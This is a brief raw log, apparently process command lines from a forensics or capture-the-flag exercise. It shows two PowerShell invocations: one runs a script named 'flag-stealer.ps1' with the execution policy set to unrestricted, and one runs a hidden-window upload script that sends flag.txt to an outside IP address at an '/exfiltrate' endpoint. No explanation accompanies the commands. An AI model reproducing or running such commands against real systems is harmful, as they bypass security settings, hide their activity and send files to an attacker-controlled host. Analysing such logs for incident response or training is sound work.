powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\flag-stealer.ps1
2056powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\test22\AppData\Local\Temp\upload_script.ps1" "C:\Users\test22\AppData\Local\Temp\flag.txt" "http://18.157.68.73:11858/exfiltrate"
2200